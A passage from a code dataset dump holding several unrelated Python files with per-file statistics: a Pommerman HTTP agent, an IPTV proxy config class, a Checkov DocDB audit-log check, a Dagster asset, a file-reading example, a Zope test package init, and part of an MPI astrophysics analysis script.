| 28.388889 | 105 | 0.672211 | 132 | 1,022 | 4.969697 | 0.409091 | 0.20122 | 0.152439 | 0.067073 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002503 | 0.2182 | 1,022 | 35 | 106 | 29.2 | 0.818523 | 0.136986 | 0 | 0 | 0 | 0 | 0.220537 | 0.082847 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.111111 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8174be4107d534513138717c81ca4815dbd17aaf | 2,760 | py | Python | pommerman/agents/http_agent.py | KaixiangLin/playground | a0eb299f4772bada1c528a881f3bf26404b131aa | [
"Apache-2.0"
] | 2 | 2018-11-10T08:31:13.000Z | 2018-11-13T08:16:45.000Z | pommerman/agents/http_agent.py | KaixiangLin/playground | a0eb299f4772bada1c528a881f3bf26404b131aa | [
"Apache-2.0"
] | null | null | null | pommerman/agents/http_agent.py | KaixiangLin/playground | a0eb299f4772bada1c528a881f3bf26404b131aa | [
"Apache-2.0"
] | null | null | null | '''The HTTP agent - provides observation using http push to remote
agent and expects action in the reply'''
import json
import time
import os
import threading
import requests
from . import BaseAgent
from .. import utility
from .. import characters
class HttpAgent(BaseAgent):
"""The HTTP Agent that connects to a port with a remote agent where the
character runs. It uses the same interface as the docker agent and
is useful for debugging."""
def __init__(self,
port=8080,
host='localhost',
timeout=120,
character=characters.Bomber):
self._port = port
self._host = host
self._timeout = timeout
super(HttpAgent, self).__init__(character)
self._wait_for_remote()
def _wait_for_remote(self):
"""Wait for network service to appear. A timeout of 0 waits forever."""
timeout = self._timeout
backoff = .25
max_backoff = min(timeout, 16)
if timeout:
# time module is needed to calc timeout shared between two exceptions
end = time.time() + timeout
while True:
try:
now = time.time()
if timeout and end < now:
print("Timed out - %s:%s" % (self._host, self._port))
raise
request_url = 'http://%s:%s/ping' % (self._host, self._port)
req = requests.get(request_url)
self._acknowledged = True
return True
except requests.exceptions.ConnectionError as e:
print("ConnectionError: ", e)
backoff = min(max_backoff, backoff * 2)
time.sleep(backoff)
except requests.exceptions.HTTPError as e:
print("HTTPError: ", e)
backoff = min(max_backoff, backoff * 2)
time.sleep(backoff)
def act(self, obs, action_space):
obs_serialized = json.dumps(obs, cls=utility.PommermanJSONEncoder)
request_url = "http://{}:{}/action".format(self._host, self._port)
try:
req = requests.post(
request_url,
timeout=0.15,
json={
"obs":
obs_serialized,
"action_space":
json.dumps(action_space, cls=utility.PommermanJSONEncoder)
})
action = req.json()['action']
except requests.exceptions.Timeout as e:
print('Timeout!')
# TODO: Fix this. It's ugly.
action = [0] * len(action_space.shape)
if len(action) == 1:
action = action[0]
return action
| 34.074074 | 81 | 0.544565 | 298 | 2,760 | 4.916107 | 0.385906 | 0.027304 | 0.024573 | 0.032765 | 0.061433 | 0.061433 | 0.061433 | 0.061433 | 0.061433 | 0.061433 | 0 | 0.011429 | 0.365942 | 2,760 | 80 | 82 | 34.5 | 0.825714 | 0.153623 | 0 | 0.095238 | 0 | 0 | 0.051694 | 0 | 0 | 0 | 0 | 0.0125 | 0 | 1 | 0.047619 | false | 0 | 0.126984 | 0 | 0.222222 | 0.063492 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8188e19b101be322e95cf844a7e3d5f16f246e15 | 346 | py | Python | iptv_proxy/providers/beast/json_api.py | sfanous/IPTVProxy | 23047be01a229ef8f69ea6ca55185eae93adc56e | [
"MIT"
] | 9 | 2018-11-02T02:51:50.000Z | 2022-01-12T06:22:33.000Z | iptv_proxy/providers/beast/json_api.py | sfanous/IPTVProxy | 23047be01a229ef8f69ea6ca55185eae93adc56e | [
"MIT"
] | 3 | 2019-05-11T21:28:32.000Z | 2020-04-27T00:58:46.000Z | iptv_proxy/providers/beast/json_api.py | sfanous/IPTVProxy | 23047be01a229ef8f69ea6ca55185eae93adc56e | [
"MIT"
] | 7 | 2019-01-03T20:31:30.000Z | 2022-01-29T04:09:24.000Z | import logging
from iptv_proxy.providers.beast.constants import BeastConstants
from iptv_proxy.providers.iptv_provider.json_api import ProviderConfigurationJSONAPI
logger = logging.getLogger(__name__)
class BeastConfigurationJSONAPI(ProviderConfigurationJSONAPI):
__slots__ = []
_provider_name = BeastConstants.PROVIDER_NAME.lower()
| 26.615385 | 84 | 0.84104 | 34 | 346 | 8.117647 | 0.588235 | 0.057971 | 0.094203 | 0.15942 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.098266 | 346 | 12 | 85 | 28.833333 | 0.884615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.428571 | 0 | 0.857143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
818d2b5226021a3473fd95143600b3a63ac484e1 | 869 | py | Python | checkov/cloudformation/checks/resource/aws/DocDBAuditLogs.py | niradler/checkov | 2628c6f28a5604efe3877d6eacc3044d2b66b7b1 | [
"Apache-2.0"
] | null | null | null | checkov/cloudformation/checks/resource/aws/DocDBAuditLogs.py | niradler/checkov | 2628c6f28a5604efe3877d6eacc3044d2b66b7b1 | [
"Apache-2.0"
] | 2 | 2022-03-07T07:15:32.000Z | 2022-03-21T07:21:17.000Z | checkov/cloudformation/checks/resource/aws/DocDBAuditLogs.py | niradler/checkov | 2628c6f28a5604efe3877d6eacc3044d2b66b7b1 | [
"Apache-2.0"
] | null | null | null | from checkov.cloudformation.checks.resource.base_resource_check import BaseResourceCheck
from checkov.common.parsers.node import DictNode
from checkov.common.models.enums import CheckResult, CheckCategories
class DocDBAuditLogs(BaseResourceCheck):
    def __init__(self) -> None:
        name = "Ensure DocDB has audit logs enabled"
        id = "CKV_AWS_104"
        supported_resources = ["AWS::DocDB::DBClusterParameterGroup"]
        categories = [CheckCategories.LOGGING]
        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)

    def scan_resource_conf(self, conf: DictNode) -> CheckResult:
        params = conf.get("Properties", {}).get("Parameters", {})
        if params.get("audit_logs") == "enabled":
            return CheckResult.PASSED
        return CheckResult.FAILED
check = DocDBAuditLogs()
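The nested `.get` chain in `scan_resource_conf` degrades gracefully when either key is missing. A standalone sketch of that lookup against hypothetical resource conf dicts (no checkov imports needed; the helper name is illustrative):

```python
def audit_logs_enabled(conf):
    # Mirrors the lookup in scan_resource_conf: missing keys fall back to {}.
    params = conf.get("Properties", {}).get("Parameters", {})
    return params.get("audit_logs") == "enabled"

passing = {"Properties": {"Parameters": {"audit_logs": "enabled"}}}
failing = {"Properties": {}}  # no Parameters block at all

print(audit_logs_enabled(passing))  # True  -> CheckResult.PASSED
print(audit_logs_enabled(failing))  # False -> CheckResult.FAILED
```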
| 36.208333 | 106 | 0.721519 | 91 | 869 | 6.692308 | 0.549451 | 0.054187 | 0.055829 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00419 | 0.176064 | 869 | 23 | 107 | 37.782609 | 0.846369 | 0 | 0 | 0 | 0 | 0 | 0.135788 | 0.040276 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0.0625 | 0.1875 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
8195c711df03d29790fdcc4e7f130ef66986f549 | 788 | py | Python | examples/simple_lakehouse/simple_lakehouse/assets.py | bitdotioinc/dagster | 4fe395a37b206b1a48b956fa5dd72bf698104cca | [
"Apache-2.0"
] | 2 | 2021-06-21T17:50:26.000Z | 2021-06-21T19:14:23.000Z | examples/simple_lakehouse/simple_lakehouse/assets.py | bitdotioinc/dagster | 4fe395a37b206b1a48b956fa5dd72bf698104cca | [
"Apache-2.0"
] | 7 | 2022-03-16T06:55:04.000Z | 2022-03-18T07:03:25.000Z | examples/simple_lakehouse/simple_lakehouse/assets.py | bitdotioinc/dagster | 4fe395a37b206b1a48b956fa5dd72bf698104cca | [
"Apache-2.0"
] | 1 | 2021-08-18T17:21:57.000Z | 2021-08-18T17:21:57.000Z | """Asset definitions for the simple_lakehouse example."""
import pandas as pd
from lakehouse import Column, computed_table, source_table
from pyarrow import date32, float64, string
sfo_q2_weather_sample_table = source_table(
path="data", columns=[Column("tmpf", float64()), Column("valid_date", string())],
)
@computed_table(
input_assets=[sfo_q2_weather_sample_table],
columns=[Column("valid_date", date32()), Column("max_tmpf", float64())],
)
def daily_temperature_highs_table(sfo_q2_weather_sample: pd.DataFrame) -> pd.DataFrame:
"""Computes the temperature high for each day"""
sfo_q2_weather_sample["valid_date"] = pd.to_datetime(sfo_q2_weather_sample["valid"])
return sfo_q2_weather_sample.groupby("valid_date").max().rename(columns={"tmpf": "max_tmpf"})
| 41.473684 | 97 | 0.757614 | 108 | 788 | 5.194444 | 0.435185 | 0.053476 | 0.128342 | 0.192513 | 0.163993 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022695 | 0.10533 | 788 | 18 | 98 | 43.777778 | 0.77305 | 0.119289 | 0 | 0 | 0 | 0 | 0.106881 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.230769 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8197395414f35f5a57891af7ddfab20969d9cd9f | 301 | py | Python | 17-files/read-file-with-try-block.py | johnehunt/Python3Intro | 2a41ce488aac11bb3928ea81e57be1c2c8acdac2 | [
"Apache-2.0"
] | 1 | 2020-11-03T19:46:25.000Z | 2020-11-03T19:46:25.000Z | 14-files/read-file-with-try-block.py | johnehunt/PythonIntroDS | 7e9d5c5494191cd68bc71e140df5fb30290a8da6 | [
"Apache-2.0"
] | null | null | null | 14-files/read-file-with-try-block.py | johnehunt/PythonIntroDS | 7e9d5c5494191cd68bc71e140df5fb30290a8da6 | [
"Apache-2.0"
] | 1 | 2019-09-21T08:24:46.000Z | 2019-09-21T08:24:46.000Z | # Illustrates combining exception / error handling
# with file access
print('Start')
try:
    with open('myfile2.txt', 'r') as f:
        lines = f.readlines()
        for line in lines:
            print(line, end='')
except FileNotFoundError as err:
    print('oops')
    print(err)
print('Done')
| 20.066667 | 50 | 0.61794 | 38 | 301 | 4.894737 | 0.736842 | 0.086022 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004444 | 0.252492 | 301 | 14 | 51 | 21.5 | 0.822222 | 0.215947 | 0 | 0 | 0 | 0 | 0.107296 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
819bd18a4722e9a3211561882e51cf2324399bde | 1,693 | py | Python | src/Testing/ZopeTestCase/__init__.py | tseaver/Zope-RFA | 08634f39b0f8b56403a2a9daaa6ee4479ef0c625 | [
"ZPL-2.1"
] | 2 | 2015-12-21T10:34:56.000Z | 2017-09-24T11:07:58.000Z | src/Testing/ZopeTestCase/__init__.py | MatthewWilkes/Zope | 740f934fc9409ae0062e8f0cd6dcfd8b2df00376 | [
"ZPL-2.1"
] | null | null | null | src/Testing/ZopeTestCase/__init__.py | MatthewWilkes/Zope | 740f934fc9409ae0062e8f0cd6dcfd8b2df00376 | [
"ZPL-2.1"
] | null | null | null | ##############################################################################
#
# Copyright (c) 2005 Zope Foundation and Contributors.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Names exported by the ZopeTestCase package
"""
import ZopeLite as Zope2
import utils
import layer
from ZopeLite import hasProduct
from ZopeLite import installProduct
from ZopeLite import hasPackage
from ZopeLite import installPackage
from ZopeLite import _print
from ZopeTestCase import folder_name
from ZopeTestCase import user_name
from ZopeTestCase import user_password
from ZopeTestCase import user_role
from ZopeTestCase import standard_permissions
from ZopeTestCase import ZopeTestCase
from ZopeTestCase import FunctionalTestCase
from PortalTestCase import portal_name
from PortalTestCase import PortalTestCase
from sandbox import Sandboxed
from functional import Functional
from base import TestCase
from base import app
from base import close
from warnhook import WarningsHook
from unittest import main
from zopedoctest import ZopeDocTestSuite
from zopedoctest import ZopeDocFileSuite
from zopedoctest import FunctionalDocTestSuite
from zopedoctest import FunctionalDocFileSuite
import zopedoctest as doctest
import transaction
import placeless
Zope = Zope2
| 29.189655 | 78 | 0.759598 | 197 | 1,693 | 6.492386 | 0.472081 | 0.087568 | 0.120407 | 0.060985 | 0.046912 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005416 | 0.127584 | 1,693 | 57 | 79 | 29.701754 | 0.860528 | 0.282339 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.03125 | 0.96875 | 0 | 0.96875 | 0.03125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
81afed5d2a7be68d968744aa55c07d3f1c78d48b | 241,016 | py | Python | output/myresults.py | jacobseiler/rsage | b3b0a3fa3c676eab188991e37d06894396bfc74f | [
"MIT"
] | 1 | 2019-05-23T04:11:32.000Z | 2019-05-23T04:11:32.000Z | output/myresults.py | jacobseiler/rsage | b3b0a3fa3c676eab188991e37d06894396bfc74f | [
"MIT"
] | 7 | 2018-08-17T05:04:57.000Z | 2019-01-16T05:40:16.000Z | output/myresults.py | jacobseiler/rsage | b3b0a3fa3c676eab188991e37d06894396bfc74f | [
"MIT"
] | null | null | null | #!/usr/bin/env python
from __future__ import print_function
import matplotlib
matplotlib.use('Agg')
import os
import heapq
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.colors as colors
import matplotlib.cm as cm
from numpy import *
from random import sample, seed, randint
from os.path import getsize as getFileSize
import math
import random
import csv
from cycler import cycler
from io import StringIO
#np.set_printoptions(threshold=np.nan)
from collections import Counter
from matplotlib.colors import LogNorm
from mpl_toolkits.axes_grid1 import AxesGrid
from astropy import units as u
from astropy import cosmology
import matplotlib.ticker as mtick
import PlotScripts
import ReadScripts
import AllVars
import GalaxyPhotoion as photo
import ObservationalData as Obs
import gnedin_analytic as ga
from mpi4py import MPI
import sys
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
size = comm.Get_size()
AllVars.Set_Params_Kali()
AllVars.Set_Constants()
PlotScripts.Set_Params_Plot()
output_format = ".png"
# For the Tiamat extended results there is a weird hump when calculating the escape fraction.
# This hump occurs at a halo mass of approximately 10.3.
# The calculation of fesc skips this hump range (defined from kink_low to kink_high)
kink_low = 10.3
kink_high = 10.30000001
m_low = 7.0 # We only sum the photons coming from halos within the mass range m_low < Halo Mass < m_high
m_high = 15.0
m_gal_low = 3.0
m_gal_high = 12.0
m_low_SAGE = pow(10, m_low)/1.0e10 * AllVars.Hubble_h
m_high_SAGE = pow(10, m_high)/1.0e10 * AllVars.Hubble_h
bin_width = 0.2
NB = int((m_high - m_low) / bin_width)
NB_gal = int((m_gal_high - m_gal_low) / bin_width)
fej_low = 0.0
fej_high = 1.0
fej_bin_width = 0.05
NB_fej = int((fej_high - fej_low) / fej_bin_width)
def raise_list_power(my_list, n):
    return [pow(x, n) for x in my_list]

def raise_power_list(my_list, n):
    return [pow(n, x) for x in my_list]
def calculate_beta(MUV, z):
    '''
    Calculation of the dust attenuation parameter Beta. Fit values are from Bouwens (2015) ApJ 793, 115.
    For z = 5 and 6, Bouwens uses a piece-wise linear relationship and a linear relationship for higher redshift.

    Parameters
    ----------
    MUV : float
        A value of the absolute magnitude in the UV (generally M1600) in the AB magnitude system.
    z : float
        Redshift the attenuation is calculated at.

    Returns
    -------
    beta : float
        Value of the UV continuum parameter beta.
    '''

    if (z >= 4.5 and z < 5.5):  # z = 5 fits.
        if (MUV > -18.8):
            dB = -0.08
        else:
            dB = -0.17
        B = -2.05
        offset = 18.8
    elif (z >= 5.5 and z < 6.5):  # z = 6 fits.
        if (MUV > -18.8):
            dB = -0.08
        else:
            dB = -0.24
        B = -2.22
        offset = 18.8
    elif (z >= 6.5 and z < 7.5):  # z = 7 fits.
        dB = -0.20
        B = -2.05
        offset = 19.5
    elif (z >= 7.5 and z < 8.5):  # z = 8 fits.
        dB = -0.15
        B = -2.13
        offset = 19.5
    elif (z >= 8.5 and z < 9.5):  # z = 9 fits.
        dB = -0.16
        B = -2.19
        offset = 19.5
    elif (z >= 9.5 and z < 10.5):  # z = 10 fits.
        dB = -0.16
        B = -2.16
        offset = 19.5

    beta = dB * (MUV + offset) + B
    return beta
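A quick numeric check of the piecewise fit above. This standalone sketch re-implements only the z = 5 branch (break point at MUV = -18.8 and coefficients taken from the function body) so it can run without the rest of the module:

```python
def beta_z5(MUV):
    # z = 5 fit: slope changes at the MUV = -18.8 break point.
    dB = -0.08 if MUV > -18.8 else -0.17
    B, offset = -2.05, 18.8
    return dB * (MUV + offset) + B

print(round(beta_z5(-20.0), 3))  # -1.846, brighter than the break
print(round(beta_z5(-17.0), 3))  # -2.194, fainter than the break
```

Both branches agree at the break itself (beta = B at MUV = -18.8), which is what makes the piece-wise fit continuous.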
def multiply(array):
    '''
    Performs element-wise multiplication.

    Parameters
    ----------
    array : `~numpy.ndarray'
        The array to be multiplied.

    Returns
    -------
    total : float
        Total of the elements multiplied together.
    '''

    total = 1
    for i in range(0, len(array)):
        total *= array[i]
    return total
##
def Sum_Log(array):
    '''
    Performs an element-wise sum of an array whose elements are in log-space.

    Parameters
    ----------
    array : array
        Array with elements in log-space.

    Returns
    -------
    sum_total : float
        Value of the elements taken to the power of 10 and summed.

    Units
    -----
    All units are kept the same as the inputs.
    '''

    sum_total = 0.0
    for i in range(0, len(array)):
        sum_total += 10**array[i]
    return sum_total
##
def Std_Log(array, mean):
    '''
    Calculates the standard deviation of an array with elements in log-space.

    Parameters
    ----------
    array : array
        Array with elements in log-space.
    mean : float
        Mean of the array (not in log).

    Returns
    -------
    std : float
        Standard deviation of the input array taken to the power of 10.

    Units
    -----
    All units are kept the same as the inputs.
    '''

    sum_total = 0.0
    for i in range(0, len(array)):
        sum_total += (10**array[i] - mean)**2
    sum_total *= 1.0 / len(array)
    std = np.sqrt(sum_total)
    return std
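A minimal demonstration of the two log-space helpers above, using a hypothetical array of log10 values (stdlib only, so it runs without the rest of the module):

```python
import math

log_vals = [1.0, 2.0, 3.0]               # log10 of 10, 100, 1000

# What Sum_Log computes: de-log each element, then sum in linear space.
linear_sum = sum(10**v for v in log_vals)
print(linear_sum)                        # 1110.0

# What Std_Log computes: population std of the de-logged values about `mean`.
mean = linear_sum / len(log_vals)        # 370.0
std = math.sqrt(sum((10**v - mean)**2 for v in log_vals) / len(log_vals))
print(round(std, 1))                     # 447.0
```

Note the asymmetry the helpers guard against: summing or taking a standard deviation of the log values directly would give a very different (and wrong) answer for quantities that live in linear space.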
###
def collect_across_tasks(mean_per_task, std_per_task, N_per_task, SnapList,
                         BinSnapList=[], binned=False, m_bin_low=0.0,
                         m_bin_high=0.0, my_bin_width=bin_width):
    """
    Reduces arrays that are unique to each task onto the master task.
    The dimensions of the input arrays will change slightly if we are collecting a statistic
    that is binned across e.g., halo mass or galaxy stellar mass.

    Parameters
    ----------
    mean_per_task, std_per_task, N_per_task: Nested 2D (or 3D if binned == True) arrays of floats.
        Outer length is equal to the number of models.
        Inner length is equal to the number of snapshots the data has been calculated for.
        Inner-most length is equal to the number of bins.
        Contains the mean/standard deviation/number of objects unique to each task.

    SnapList: Nested 2D arrays of integers. Outer length is equal to the number of models.
        Contains the snapshot numbers the data has been calculated for each model.

    BinSnapList: Nested 2D arrays of integers. Outer length is equal to the number of models.
        Often statistics are calculated for ALL snapshots but we only wish to plot a subset of snapshots.
        This variable allows the binned data to be collected for only a subset of the snapshots.

    binned: Boolean.
        Dictates whether the collected data is a 2D or 3D array with the inner-most array being binned across e.g., halo mass.

    Returns
    -------
    master_mean, master_std, master_N: Nested 2D (or 3D if binned == True) arrays of floats.
        Shape is identical to the input mean_per_task etc.
        If rank == 0 these contain the collected statistics.
        Otherwise these will be None.

    master_bin_middle: Array of floats.
        Contains the location of the middle of the bins for the data.
    """

    master_mean = []
    master_std = []
    master_N = []
    master_bin_middle = []

    for model_number in range(0, len(SnapList)):
        master_mean.append([])
        master_std.append([])
        master_N.append([])
        master_bin_middle.append([])

        # If we're collecting a binned statistic (e.g., binned across halo mass), then we need to perform the collecting per snapshot.
        if binned:
            count = 0
            for snapshot_idx in range(len(SnapList[model_number])):
                if SnapList[model_number][snapshot_idx] == BinSnapList[model_number][count]:
                    master_mean[model_number], master_std[model_number], master_N[model_number] = calculate_pooled_stats(master_mean[model_number], master_std[model_number], master_N[model_number], mean_per_task[model_number][snapshot_idx], std_per_task[model_number][snapshot_idx], N_per_task[model_number][snapshot_idx])
                    master_bin_middle[model_number].append(np.arange(m_bin_low,
                                                                     m_bin_high + my_bin_width,
                                                                     my_bin_width)[:-1]
                                                           + my_bin_width * 0.5)

                    count += 1
                    if count == len(BinSnapList[model_number]):
                        break
        else:
            master_mean[model_number], master_std[model_number], master_N[model_number] = calculate_pooled_stats(master_mean[model_number], master_std[model_number], master_N[model_number],
                                                                                                                 mean_per_task[model_number], std_per_task[model_number],
                                                                                                                 N_per_task[model_number])
            if rank == 0:
                master_mean[model_number] = master_mean[model_number][0]
                master_std[model_number] = master_std[model_number][0]
                master_N[model_number] = master_N[model_number][0]

    return master_mean, master_std, master_N, master_bin_middle
###
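A minimal sketch (plain NumPy, outside the MPI pipeline; `bin_centres` is an illustrative name, not part of this module) of the bin-centre idiom used above when collecting binned statistics, i.e. `np.arange(low, high + width, width)[:-1] + 0.5 * width`:

```python
import numpy as np

def bin_centres(bin_low, bin_high, bin_width):
    """Centres of equal-width bins spanning [bin_low, bin_high].

    The edges array includes the upper bound, so dropping the last edge
    and shifting by half a bin width yields one centre per bin.
    """
    edges = np.arange(bin_low, bin_high + bin_width, bin_width)
    return edges[:-1] + 0.5 * bin_width
```

For example, `bin_centres(0.0, 1.0, 0.5)` yields the two centres 0.25 and 0.75.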
def calculate_pooled_stats(mean_pool, std_pool, N_pool, mean_local, std_local, N_local):
'''
Calculates the pooled mean and standard deviation from multiple processors and appends it to an input array.
Formulae taken from https://en.wikipedia.org/wiki/Pooled_variance
As we only care about these stats on the rank 0 process, we make use of junk inputs/outputs for other ranks.
NOTE: The input data may be an array (e.g. pooling the mean/std for a stellar mass function), in which case the pooling is performed element-wise.
Parameters
----------
mean_pool, std_pool, N_pool : array of floats.
Arrays that contain the current pooled means/standard deviation/number of data points (for rank 0) or just a junk input (for other ranks).
mean_local, std_local : float or array of floats.
The non-pooled mean and standard deviation unique for each process.
N_local : floating point number or array of floating point numbers.
Number of data points used to calculate the mean/standard deviation that is going to be added to the pool.
NOTE: Use floating point here so we can use MPI.DOUBLE for all MPI functions.
Returns
-------
mean_pool, std_pool, N_pool : array of floats.
Original arrays with the new pooled mean/standard deviation/counts appended (for rank 0) or junk values (for other ranks).
Units
-----
All units are the same as the input.
All inputs MUST BE real-space (not log-space).
'''
if isinstance(mean_local, list):
if len(mean_local) != len(std_local):
print("len(mean_local) = {0} \t len(std_local) = {1}".format(len(mean_local), len(std_local)))
raise ValueError("Lengths of mean_local and std_local should be equal")
if type(mean_local).__module__ == np.__name__ or isinstance(mean_local, list): # Checks to see if we are dealing with arrays.
N_times_mean_local = np.multiply(N_local, mean_local)
N_times_var_local = np.multiply(N_local, np.multiply(std_local, std_local))
N_local = np.array(N_local).astype(float)
N_times_mean_local = np.array(N_times_mean_local).astype(np.float64) # Double precision to match the MPI.DOUBLE reductions below.
if rank == 0: # Only rank 0 holds the final arrays so only it requires proper definitions.
N_times_mean_pool = np.zeros_like(N_times_mean_local)
N_pool_function = np.zeros_like(N_local)
N_times_var_pool = np.zeros_like(N_times_var_local)
N_times_mean_pool = N_times_mean_pool.astype(np.float64) # Recast everything to double precision then use MPI.DOUBLE.
N_pool_function = N_pool_function.astype(np.float64)
N_times_var_pool = N_times_var_pool.astype(np.float64)
else:
N_times_mean_pool = None
N_pool_function = None
N_times_var_pool = None
comm.Barrier()
N_times_mean_local = N_times_mean_local.astype(np.float64)
N_local = N_local.astype(np.float64)
N_times_var_local = N_times_var_local.astype(np.float64)
comm.Reduce([N_times_mean_local, MPI.DOUBLE], [N_times_mean_pool, MPI.DOUBLE], op = MPI.SUM, root = 0) # Sum the arrays across processors.
comm.Reduce([N_local, MPI.DOUBLE],[N_pool_function, MPI.DOUBLE], op = MPI.SUM, root = 0)
comm.Reduce([N_times_var_local, MPI.DOUBLE], [N_times_var_pool, MPI.DOUBLE], op = MPI.SUM, root = 0)
else:
N_times_mean_local = N_local * mean_local
N_times_var_local = N_local * std_local * std_local
N_times_mean_pool = comm.reduce(N_times_mean_local, op = MPI.SUM, root = 0)
N_pool_function = comm.reduce(N_local, op = MPI.SUM, root = 0)
N_times_var_pool = comm.reduce(N_times_var_local, op = MPI.SUM, root = 0)
if rank == 0:
mean_pool_function = np.zeros((len(N_pool_function)))
std_pool_function = np.zeros((len(N_pool_function)))
for i in range(0, len(N_pool_function)):
if N_pool_function[i] == 0:
mean_pool_function[i] = 0.0
else:
mean_pool_function[i] = np.divide(N_times_mean_pool[i], N_pool_function[i])
if N_pool_function[i] < 3:
std_pool_function[i] = 0.0
else:
std_pool_function[i] = np.sqrt(np.divide(N_times_var_pool[i], N_pool_function[i]))
mean_pool.append(mean_pool_function)
std_pool.append(std_pool_function)
N_pool.append(N_pool_function)
return mean_pool, std_pool, N_pool
else:
return mean_pool, std_pool, N_pool_function # Junk return because non-rank 0 doesn't care.
##
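The pooled mean/standard deviation combination performed by `calculate_pooled_stats` above can be sketched without MPI as follows (illustrative only; `pooled_stats` is not part of this module). As in the function above, only the within-group term of the pooled variance is kept:

```python
import numpy as np

def pooled_stats(means, stds, Ns):
    """Pool per-group statistics into a single mean/std.

    mean = sum(N_i * mean_i) / sum(N_i)
    std  = sqrt(sum(N_i * var_i) / sum(N_i))   (within-group term only)
    """
    means = np.asarray(means, dtype=np.float64)
    stds = np.asarray(stds, dtype=np.float64)
    Ns = np.asarray(Ns, dtype=np.float64)
    N_total = Ns.sum()
    if N_total == 0:
        return 0.0, 0.0  # Mirrors the zero-count guard in the MPI version.
    mean = (Ns * means).sum() / N_total
    std = np.sqrt((Ns * stds ** 2).sum() / N_total)
    return mean, std
```

In the MPI version, the three `N`-weighted sums are instead accumulated across ranks with `comm.Reduce(..., op=MPI.SUM)` before the final division on rank 0.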
def StellarMassFunction(SnapList, SMF, simulation_norm, FirstFile, LastFile, NumFile, ResolutionLimit_mean, model_tags, observations, paper_plot, output_tag):
'''
Calculates the stellar mass function for given galaxies with the option to overplot observations by Song et al. (2016) at z = 6, 7, 8 and/or Baldry et al. (2008) at z = 0.1.
Parallel compatible.
NOTE: The plotting assumes the redshifts we are plotting at are (roughly) the same for each model.
Parameters
----------
SnapList : Nested `array-like`, SnapList[model_number0] = [snapshot0_model0, ..., snapshotN_model0], with length equal to the number of models.
Snapshots that we plot the stellar mass function at for each model.
SMF : Nested 2-dimensional array, SMF[model_number0][snapshot0] = [bin0galaxies, ..., binNgalaxies], with length equal to the number of bins (NB_gal).
The count of galaxies within each stellar mass bin. Bounds are given by 'm_gal_low' and 'm_gal_high' in bins given by 'bin_width'.
simulation_norm : array with length equal to the number of models.
Denotes which simulation each model uses.
0 : MySim
1 : Mini-Millennium
2 : Tiamat (down to z = 5)
3 : Extended Tiamat (down to z = 1.6ish).
4 : Britton's Simulation
5 : Kali
FirstFile, LastFile, NumFile : array of integers with length equal to the number of models.
